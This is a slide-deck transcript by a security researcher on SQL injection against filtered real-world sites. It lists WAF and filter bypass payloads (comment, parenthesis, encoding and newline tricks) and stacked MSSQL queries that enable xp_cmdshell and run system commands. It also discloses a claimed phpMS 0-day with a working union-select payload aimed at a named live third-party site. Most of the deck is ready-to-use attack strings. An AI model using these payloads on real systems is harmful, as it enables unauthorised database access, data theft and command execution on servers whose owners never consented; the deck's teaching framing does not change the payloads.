SQL Injections Within Real Life Scenarious . We take upon various situations where out of the box thinking was required.

1. By Francis Alexander

2. • Got Listed at ebay and
Microsoft security
Researchers List
• Worked as free lance security
researcher for tech2.in.com
and in.com
• Found SQLi vulnerabilities
at kerala enterance portal
website
• http://tech2.in.com/news/gene
ral/updated-serious-
vulnerability-affects-kerala-
common-entrance-exams-
portal/369982
• Basically the InfoSec
Researcher Guy 

3. Strictly waf based and Real Life Based Scenarious 
MsSql Stack Based Queries(thought it as a good addon)
A PHP-MS 0-DAY 

4. First among the OWASP TOP 10 vulnerabilities
Used for gaining access to sql database and hence the b0x
Mainly of 5 types
 Union based
 Error based
 X-path based
 Blind and Time based
 Double Query based

5. So whats the catch here!!!
Pentesting real life scenarious is much difficult
than ever
Sqli has been patched and firewalls, IDS and IPS
installed everywhere
Exploiting Sqli has been difficult and tools has
disappointed to !

6. Ofcourse Failure of Sqlmap !!!
Failure of Havij which by the way is always a
failure :p
IDS , IPS and other firewall family
Apache security modules
mod_sec,htmlentities,mysql_escape,magic_quotes
and all my dear appsec modules

7. What are they !!?
Well we need to overcome the situation that has
come rather than site and lament over it
Here will focusing on the real life scenarious where
the tools fail and much of our human hard work
comes in

8. Preg_match is a comparer statement used in php
Mainly deployed by small scale waf’s
Poorly coded ones the easier an example

9. Used when “select” + any case letters are blocked
'select'+'(A-Za-z)‘
So any letter after select gets filtered out
Solution
Mysql has an option called stored variable procedure
“@” is a sign that can be used as a prefix, that denotes
stored procedure, function parameter names, and
variables names.

10. So how do we do it?
Union select 1,2,3 - - = 403 Forbidden
So It changes to
and (@:=version()) union select 1,@,3- - = bypassed

11.  So whats the Catch here 
 Most of us love the dork inurl:php?id= site:blah.com
 So what has happened most admins have changed the id=
parameters to within the url and making the tools go wreckless
and n00bs go mad
 An example would be the usuall way was
site.com/index.php?id= ,now they have gone on and changed to
site.com/index-goods-12.html
 An example site that has no point of injection at the first sight
 Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-
suis-prete,884.html

13. Usual commenting style should be followed here ie the “- -”
other wise other forms like %23(#) and /* could cause the
browser to misinterpret the statement as a comment
hence commenting out the rest and not letting it read the
.html part
In most cases encountered these type of injections, there
are white spaces which often cause a havoc and nightmare
for scanners

14.  Well dealing with white spaces depends on different scenarios
 U could use the traditional commenting style like
 id=3/**/union/**/select 1,2,3 or
 Well the problem is /**/ might be filtered in some cases
 So we use the ()which is the same as executing the query
 id=(2)union(select(1),2,3)
 NB:During html based injections it is better to use the
paranthesis

15.  Based on Error 1222
 Came across CTF’s where the answer had to be in normal
union based .
 Most tools fails here since the vulnerable column is being
parsed in between the html tags.
 Usually union statements are being provided here but the
columns do not get displayed.
 So what do we do ?
 Plse don’t say we look over the source because ur not gonna
find anything at the first shot 

17. We do this by changing the traditional union select 1,2,3 to
union select 1111,2222,3333
This helps us to search in the source but still nt available
on screen.

18. If u could like to display it on screen u could use
concat or group_concat functions and using html inside
them
Use hex of html if the quotes are blocked due to magic
quotes
Here we could see the version on closing the “</title>” tag
since the vulnerable column was being displayed within
the title block

19. Bypassing errors 400/403/404/406
 //convert(group_concat(schema_name) using ascii) from
information_schema.schemata - -
 C-style Commenting : /*!Union*/+/*!Select*/
//apart from the original source commenting the ! Executes the
command
 Character Encoding :Bypasses filters like 400
%55nion/**/%53elect
 Sub queries : Union (select 1,2,3)
//Where most WAF’s fail out

20.  id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a
 // # is comment but the %0A bypasses with the new line so the statements gets
executed
 Bypassing Error 1064
 Usually related with blocking of white spaces
 id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
// the queries are supplied in parenthesis so as to forbid the use of white
spaces
 “/**/ “Commenting also possible
 Bypassing Error 500
 and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+
// WAFs that written in the C language prone to overflow or act differently
when loaded with a bunch of data.
Give a large amount of data allows our code executing

21. Stacked queries mainly available in mssql and postgresql
servers
Underlying process is simple if chmdshell options are
enable then u are in 
Stacked Queries Support is Checked on Server using
'WAITFOR DELAY hour:min:sec’
For ex:EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-
- - would check whether cmdshell is enabled or nt
depending upon time lag.

22.  http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show advanced
options', 1-- -
 http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
 http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1-
- -
 http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -

24. Just to prove that still this exists a Real Life – demo 

25. http://www.site.com/security.asp?vulnID=123;; CREATE
TABLE funkyfresh (data varchar(8000));--
// Creates the table funkyfresh
http://www.site.com/security.asp?vulnID=123;; DECLARE
@funky varchar(4000); SET @funky=0x77686f616d69; INSERT
INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -
// WE declare a variable @funky and store it with hex equi. Of
the code
NOTE: 0x77686f616d69 => 'whoami‘

26.  /!*AND*/
5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+C
HAR(105)+CHAR(93)+(SELECT TOP 1
SUBSTRING((ISNULL(CAST(data AS
NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE
ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1
ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM
funkyfresh ORDER BY data) ORDER BY
data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHA
R(93)))
// Creadits to Bernardo's original write-up from BlackHat
//The reason I took it although a bit complicated works for no reason
seamlessly
 Read the temp table to get the results and you need to make sure you
deal with same data type when you do...

28.  0-day by me 
 phpMS - a free CMS (content management system),
 Designed for rapid development and support of web-projects of any
complexity.
 Features CMS phpMS:
 Easy to install;
 Multi-level menus;
 Arbitrary arrangement of blocks;
 Simple module development;
 Access rights

29. Demo http://http://www.rusug.ru/index.php?tree=8&mode=view&id=-
7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6--
#By default 6 columns in most cases seen so could use this as default in
sites discovered
#Finding the admin page of this makes it very easy to exploit 
# Default admin page is admin.php :-)
Eg : http://www.site.com/admin.php :)

30. References
 Couple of Blackhat talks and papers
 kaotickreations.blogspot.in (my blog)
 http://websec.wordpress.com/tag/sql-filter-evasion/